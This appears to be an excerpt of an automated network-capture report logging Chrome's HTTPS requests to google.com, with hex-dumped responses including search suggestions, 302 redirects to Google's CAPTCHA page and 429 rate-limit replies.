                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                              Server: gws
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Accept-Ranges: none
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              2024-04-26 14:48:11 UTC610INData Raw: 32 35 62 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 69 6e 61 6c 20 6a 65 6f 70 61 72 64 79 20 61 70 72 69 6c 20 32 35 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 61 69 72 70 6f 72 74 73 22 2c 22 73 74 75 64 65 6e 74 20 6c 6f 61 6e 73 22 2c 22 6a 61 63 6b 73 6f 6e 20 73 74 61 74 65 20 63 6f 61 63 68 20 74 6f 6d 65 6b 69 61 20 72 65 65 64 22 2c 22 62 6c 69 7a 7a 61 72 64 20 63 61 6e 63 65 6c 65 64 20 62 6c 69 7a 7a 63 6f 6e 22 2c 22 73 6c 69 70 6b 6e 6f 74 20 64 72 75 6d 6d 65 72 22 2c 22 73 6c 61 63 6b 20 73 74 65 77 61 72 74 20 62 75 74 74 65 72 66 69 65 6c 64 22 2c 22 73 6f 75 74 68 20 63 61 72 6f 6c 69 6e 61 20 63 69 63 61 64 61 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22
                                                                                                                              Data Ascii: 25b)]}'["",["final jeopardy april 25","southwest airlines airports","student loans","jackson state coach tomekia reed","blizzard canceled blizzcon","slipknot drummer","slack stewart butterfield","south carolina cicadas"],["","","","","","","",""],[],{"
                                                                                                                              2024-04-26 14:48:11 UTC95INData Raw: 35 39 0d 0a 51 55 46 52 51 55 4a 42 51 55 51 76 4d 6e 64 44 52 55 46 42 61 30 64 43 64 32 64 49 51 6d 64 72 53 55 4a 33 5a 30 74 44 5a 32 74 4d 52 46 4a 5a 55 45 52 52 64 30 31 45 55 6e 4e 56 52 6c 4a 42 56 30 6c 43 4d 47 6c 4a 61 55 46 6b 53 48 67 34 61 30 74 45 55 58 4e 4b 51 0d 0a
                                                                                                                              Data Ascii: 59QUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ
                                                                                                                              2024-04-26 14:48:11 UTC1255INData Raw: 61 33 34 0d 0a 31 6c 34 53 6e 67 34 5a 6b 78 55 4d 48 52 4e 56 46 55 7a 54 32 70 76 4e 6b 6c 35 63 79 39 53 52 44 67 30 55 58 70 52 4e 55 39 71 59 30 4a 44 5a 32 39 4c 52 46 46 33 54 6b 64 6e 4f 46 42 48 61 6d 4e 73 53 48 6c 56 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 4c 79 39 42 51 55 4a 46 53 55 46 46 51 55 46 52 51 55 31 43 53 57 64 42 51 30 56 52 52 55 52 46 55 55 67 76 65 45 46 42 59 30 46 42 51 55 4e 42 5a 30 31 43 51 56 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 52 55 4a 52 54 55 64 42 55 55 6c 49 51 30 46 45 4c 33 68
                                                                                                                              Data Ascii: a341l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBY0FBQUNBZ01CQVFBQUFBQUFBQUFBQUFBRUJRTUdBUUlIQ0FEL3h
                                                                                                                              2024-04-26 14:48:11 UTC1255INData Raw: 7a 54 55 35 34 54 43 73 7a 51 6b 6b 7a 52 45 39 52 61 44 56 57 54 45 70 78 56 6e 68 68 55 58 5a 61 65 45 68 68 63 47 74 46 61 48 6c 32 52 6b 68 42 4d 6d 35 75 65 54 5a 6c 62 46 6c 55 62 32 4e 43 64 57 39 73 57 45 74 33 4d 6b 64 36 5a 56 70 77 55 56 68 56 59 6b 64 4c 5a 56 6f 32 4d 54 42 69 4f 45 5a 35 64 47 70 78 4d 6e 46 4d 54 33 6c 6f 4d 32 64 71 4d 6b 78 75 4e 48 4e 4e 4d 6d 4e 6c 56 31 49 32 4d 58 6c 31 53 7a 6c 6c 54 30 39 51 61 56 4a 75 61 6d 35 78 5a 6b 64 74 56 6e 5a 6c 4e 55 4e 6f 64 6d 55 33 64 53 39 4f 56 56 68 4b 4e 47 6b 34 56 44 42 6d 4d 6d 68 53 5a 46 51 77 53 46 56 4d 52 6a 52 61 62 46 63 32 64 46 70 4a 4d 56 6c 4d 62 6b 63 31 56 47 63 34 53 7a 68 32 55 48 64 6f 54 45 56 5a 55 46 68 33 63 6e 42 6c 61 44 6c 32 5a 46 4a 30 65 45 5a 49 5a 6e
                                                                                                                              Data Ascii: zTU54TCszQkkzRE9RaDVWTEpxVnhhUXZaeEhhcGtFaHl2RkhBMm5ueTZlbFlUb2NCdW9sWEt3Mkd6ZVpwUVhVYkdLZVo2MTBiOEZ5dGpxMnFMT3loM2dqMkxuNHNNMmNlV1I2MXl1SzllT09QaVJuam5xZkdtVnZlNUNodmU3dS9OVVhKNGk4VDBmMmhSZFQwSFVMRjRabFc2dFpJMVlMbkc1VGc4Szh2UHdoTEVZUFh3cnBlaDl2ZFJ0eEZIZn
                                                                                                                              2024-04-26 14:48:11 UTC109INData Raw: 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                              Data Ascii: 362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY"]}]
                                                                                                                              2024-04-26 14:48:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449736142.250.64.1964437880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:10 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.449734142.250.64.1964437880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:10 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: keep-alive
                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-04-26 14:48:11 UTC1843INHTTP/1.1 302 Found
                                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                              x-hallmonitor-challenge: CgwIq_2usQYQ6OXmwwESBGaBmNw
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                              Permissions-Policy: unload=()
                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:11 GMT
                                                                                                                              Server: gws
                                                                                                                              Content-Length: 458
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Set-Cookie: 1P_JAR=2024-04-26-14; expires=Sun, 26-May-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                              Set-Cookie: NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg; expires=Sat, 26-Oct-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2024-04-26 14:48:11 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449733142.250.64.1964437880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:10 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-04-26 14:48:11 UTC1761INHTTP/1.1 302 Found
                                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                              x-hallmonitor-challenge: CgwIq_2usQYQnIrstAESBGaBmNw
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                              Permissions-Policy: unload=()
                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:11 GMT
                                                                                                                              Server: gws
                                                                                                                              Content-Length: 417
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Set-Cookie: 1P_JAR=2024-04-26-14; expires=Sun, 26-May-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                              Set-Cookie: NID=513=HR0V9wKUcTQOQQwMaEeki6_3HwjVRL2ayLc7xFtv9eWyVkhuXeYblBvhiMcHf-Ir85lBUdatIIyPQXk_8jaJdMWPHGulp8WgK0jg6oJYSqdLN2K9wUgzsHMYnaCHISF0M8jT-BPGZEX-uTOHMGZJlJB-lVBV7L0_sXvwookG2Ts; expires=Sat, 26-Oct-2024 14:48:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2024-04-26 14:48:11 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449737142.250.64.1964437880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:11 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
                                                                                                                              2024-04-26 14:48:12 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:12 GMT
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Content-Type: text/html
                                                                                                                              Server: HTTP server (unknown)
                                                                                                                              Content-Length: 3114
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2024-04-26 14:48:12 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                              2024-04-26 14:48:12 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 68 6a 6c 71 35 7a 53 56 71 33 31 73 52 66 49 51 63 48 63 41 59 67 5a 34 45 6c 55 73 4b 2d 39 41 67
                                                                                                                              Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="hjlq5zSVq31sRfIQcHcAYgZ4ElUsK-9Ag
                                                                                                                              2024-04-26 14:48:12 UTC960INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                                              Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.449738142.250.64.1964437880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:12 UTC912OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: keep-alive
                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
                                                                                                                              2024-04-26 14:48:12 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:12 GMT
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Content-Type: text/html
                                                                                                                              Server: HTTP server (unknown)
                                                                                                                              Content-Length: 3186
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2024-04-26 14:48:12 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
